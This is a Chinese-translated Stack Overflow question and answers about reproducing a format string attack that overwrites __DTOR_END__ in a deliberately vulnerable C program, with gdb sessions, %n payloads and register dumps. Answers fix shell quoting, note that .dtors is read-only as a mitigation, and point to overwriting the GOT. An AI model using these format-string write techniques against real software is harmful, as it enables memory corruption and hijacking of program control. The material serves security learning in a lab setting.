格式化字符串攻击 - 覆盖 __DTOR_END__

【问题标题】:Format String Attack - Overwrite __DTOR_END__格式化字符串攻击 - 覆盖 __DTOR_END__
【发布时间】:2016-04-07 05:39:21
【问题描述】:

我正在尝试重复此link 中讨论的攻击,但我无法成功。目标是通过格式字符串漏洞覆盖符号__DTOR_END__ 处的值。

以下是我尝试过的。易受攻击的程序:

#include <stdio.h>
#include <stdlib.h>

int main (int argc, char *argv[]) {
    char buf[512];
    if (argc < 2) { printf("%s\n","Failed"); return 1; }
    snprintf(buf, sizeof(buf), argv[1]); // Vulnerable statement
    buf[sizeof (buf) - 1] = '\x00';
    return 0;
}

第 1 步:

$ gcc fmt.c -o fmt_g -g

第 2 步:

$ ltrace ./fmt_g 'AAAA.%9$x'
__libc_start_main(0x8048464, 2, 0xbffff404, 0x80484f0, 0x8048560  <unfinished ...>
snprintf("AAAA.41414141", 512, "AAAA.%9$x", 0x20)                        = 13
+++ exited (status 0) +++
$

这表明对应于 A 的十六进制 0x41 在 9 %x 之后打印。

第 3 步:

$ nm fmt_g | grep DTOR
  08049f20 D __DTOR_END__
  08049f1c d __DTOR_LIST__
$

__ DTOR_END__ 的地址是0x08049f20

第 4 步:

$ gdb fmt_g
(gdb) disas main
      ...
      0x080484bb <+87>: call   0x80483a0 <snprintf@plt>
      ...
(gdb) (gdb) break *main+87
      Breakpoint 1 at 0x80484bb: file fmt_g.c, line 7.
(gdb) r $(printf "\x20\x9f\x04\x08AAAA")%x%x%x%x%x%x%x%x%n
      Starting program: fmt2_g $(printf "\x20\x9f\x04\x08AAAA")%x%x%x%x%x%x%x%x%n

      Breakpoint 1, 0x080484bb in main (argc=2, argv=0xbffff3a4) at fmt_g.c:7
      7 snprintf(buf, sizeof(buf), argv[1]);
(gdb) x/10x 0x08049f20
      0x8049f20 <__DTOR_END__>: 0x00000000  0x00000000  0x00000001  0x00000010
      0x8049f30 <_DYNAMIC+8>:   0x0000000c  0x08048318  0x0000000d  0x0804859c
      0x8049f40 <_DYNAMIC+24>:  0x6ffffef5  0x080481ac
(gdb) s

      Program received signal SIGSEGV, Segmentation fault.
      0xb7e66bcd in vfprintf () from /lib/i386-linux-gnu/libc.so.6
(gdb)

我得到了 SIGSEGV。我在一个小端的 Linux 机器上尝试这个。 出于好奇,我尝试以相反的方式使用该地址:

(gdb) r $(printf "\x08\x04\x9f\x20AAAA")%x%x%x%x%x%x%x%x%n
      Starting program: fmt2_g  $(printf "\x08\x04\x9f\x20AAAA")%x%x%x%x%x%x%x%x%n

      Breakpoint 1, 0x080484bb in main (argc=3, argv=0xbffff3a4) at fmt2_g.c:7
      7 snprintf(buf, sizeof(buf), argv[1]);
(gdb) x/10x 0x08049f20
      0x8049f20 <__DTOR_END__>: 0x00000000  0x00000000  0x00000001  0x00000010
      0x8049f30 <_DYNAMIC+8>:   0x0000000c  0x08048318  0x0000000d  0x0804859c
      0x8049f40 <_DYNAMIC+24>:  0x6ffffef5  0x080481ac
(gdb) s
      8 buf[sizeof (buf) - 1] = '\x00';
(gdb) x/10x 0x08049f20
      0x8049f20 <__DTOR_END__>: 0x00000000  0x00000000  0x00000001  0x00000010
      0x8049f30 <_DYNAMIC+8>:   0x0000000c  0x08048318  0x0000000d  0x0804859c
      0x8049f40 <_DYNAMIC+24>:  0x6ffffef5  0x080481ac
(gdb)

我不知道我做错了什么。我的想法是我没有正确使用__ DTOR_END__ 的地址。有人可以提供一些提示吗?

【问题讨论】:

    标签: c linux printf format-string


    【解决方案1】:

    问题其实很简单:你的 shell 正在解释来自printf 的输出。 \x20 是一个空格字符,因此在第一个示例中,您的 shell 基本上剥离了空格并传递了 \x9f\x04\x08AAAA%x%x... 导致崩溃(通过尝试写入地址 0x4108049f)。在第二个示例中,您最终传递了 两个 参数,\x08\x04\x9fAAAA%x%x...;第一个参数没有做任何有趣的事情,所以没有崩溃。

    要修复,只需将整个参数括在引号中:r "$(printf "\x20\x9f\x04\x08AAAA")%x%x%x%x%x%x%x%x%n"。以后,这里有一些调试技巧要牢记(我经常使用):

    • 始终检查程序崩溃的原因。 disas(或者,如果需要,x/i $pc)会告诉你崩溃指令,info reg 会告诉你寄存器;一起,这将准确地告诉你程序崩溃时试图做什么。例如,在第一种情况下,您应该看到 mov 指令正在尝试写入某个寄存器定义的内存地址,并且该寄存器设置为 0x4108049f。
    • 检查您的输入。这是对p argv[1] 的快速检查,以确保您获得了正确的输入。通常很容易忽略导致输入例程提前终止的嵌入式空格、NUL 或高位 ASCII 字符。

    【讨论】:

    • 我使用r "$(printf "\x08\x04\x9f\x20AAAA")%x%x%x%x%x%x%x%x%n" 尝试了您的方法。我仍然收到 SIGSEGV。我也试过r "$(printf '\x08\x04\x9f\x20AAAA')%x%x%x%x%x%x%x%x%n"(用单引号替换内引号)——我仍然得到SIGSEGV。在我的设置中,当使用 gdb 0x209f0408 时无法访问。
    • 你需要使用小端序:r "$(printf "\x20\x9f\x04\x08AAAA")%x%x%x%x%x%x%x%x%n"
    • 我试过了:r "$(printf '\x20\x9f\x04\x08AAAA')%x%x%x%x%x%x%x%x%n"。我得到了 SIGSEGV。
    • 在哪里?遵循调试提示!您应该尝试找出失败的原因。
    • 我想我明白了。那个内存是不可写的。可能是我使用的链接太旧了。我正在为我的问题添加一个答案。如果您知道任何使 DTOR 映射可写的方法,请告诉我。谢谢
    【解决方案2】:

    根据@nneonneo 的回答,我尝试了以下方法:

    (gdb) b *main+87
Breakpoint 1 at 0x80484bb: file fmt2.c, line 11.
(gdb) r "$(printf "\x20\x9f\x04\x08AAAA")%x%x%x%x%x%x%x%x%n"
Starting program: fmt2_g "$(printf "\x20\x9f\x04\x08AAAA")%x%x%x%x%x%x%x%x%n"

Breakpoint 1, 0x080484bb in main (argc=2, argv=0xbffff3a4) at fmt2.c:11
11      snprintf(buf, sizeof(buf), argv[1]);
(gdb) s

Program received signal SIGSEGV, Segmentation fault.
0xb7e66bcd in vfprintf () from /lib/i386-linux-gnu/libc.so.6
(gdb) info reg
eax            0x8049f20    134520608
ecx            0xbffff0fc   -1073745668
edx            0xb7e64c1a   -1209644006
ebx            0xb7fc4ff4   -1208201228
esp            0xbfffe9c0   0xbfffe9c0
ebp            0xbfffef78   0xbfffef78
esi            0xbfffefb0   -1073746000
edi            0x34 52
eip            0xb7e66bcd   0xb7e66bcd <vfprintf+16669>
eflags         0x210296 [ PF AF SF IF RF ID ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0  0
gs             0x33 51
(gdb) x/i $pc
=> 0xb7e66bcd <vfprintf+16669>: mov    %edi,(%eax)
(gdb)

    0x08049f20 的 mov 操作会导致 SIGSEGV。我检查了proc的内存映射:

     (gdb) info proc
 process 6303

 root@pc:/proc/6303# cat maps
 08048000-08049000 r-xp 00000000 08:01 1720261  fmt2_g
 08049000-0804a000 r--p 00000000 08:01 1720261  fmt2_g
 0804a000-0804b000 rw-p 00001000 08:01 1720261  fmt2_g

    地址08049f20 不可写。我认为这就是 SIGSEGV 发生的原因。

    不知道能不能映射成可写的。

    【讨论】:

    • dtors 列表在新的二进制文件上是不可写的——它是一种利用缓解技术。但是,GOT(全局偏移表)可能是可写的;尝试在那里覆盖一个指针,看看你是否可以获得控制权。
    猜你喜欢
    • 2012-11-04
    • 2016-02-16
    • 2013-01-08
    • 1970-01-01
    • 1970-01-01
    • 1970-01-01
    • 2015-01-17
    • 1970-01-01
    • 2012-09-26
    相关资源
    最近更新 更多
    热门标签
    Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode